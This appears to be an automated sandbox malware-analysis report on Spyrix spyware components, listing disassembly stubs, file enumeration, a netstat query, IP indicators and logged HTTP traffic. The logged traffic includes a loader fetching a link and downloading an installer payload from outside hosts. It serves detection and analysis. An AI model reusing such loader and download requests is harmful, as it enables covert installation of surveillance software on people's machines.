Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: -----BEGIN PUBLIC KEY-----		65_2_00258FA0
Source: qrl.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: https://dashboard.spyrix.com/login

HTTP Parser: Number of links: 0

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://dashboard.spyrix.com/login

HTTP Parser: Title: Welcome Back does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="author".. found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:55007 version: TLS 1.2

Source: 404.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0040AC68 FindFirstFileW,FindClose,	51_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	51_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033A75E8 FindFirstFileA,	51_2_033A75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033A76C4 FindFirstFileA,GetLastError,	51_2_033A76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, edx	65_2_0024B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp dword ptr [edi+04h], ebp	65_2_002448F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	65_2_002A5060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push esi	65_2_002420F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then add eax, dword ptr [ecx+10h]	65_2_002AC0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ecx, eax	65_2_0029F270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edi, dword ptr [ebx]	65_2_00247360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov byte ptr [edx], cl	65_2_00285360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00246370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [ebx]	65_2_002533B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_002474E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 0000000Ch	65_2_002536A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000019h	65_2_002536A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_002476C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_0024774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_002477DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_0024785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [edi-04h]	65_2_0029E8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_002478AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_002479B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	65_2_002659E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [edi]	65_2_00235A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	65_2_00258AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, ebp	65_2_0025DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	65_2_0025DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	65_2_00258BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp esi, edi	65_2_00286C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	65_2_00273C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edx, dword ptr [esp+74h]	65_2_0025BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	65_2_00247D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebp, dword ptr [ebx+58h]	65_2_0029ADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [edi]	65_2_00288EF0

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Source: global traffic

TCP traffic: 192.168.2.7:55006 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1Host: filedn.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_002673D0 recv,send,WSAGetLastError,

65_2_002673D0

Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1Host: filedn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
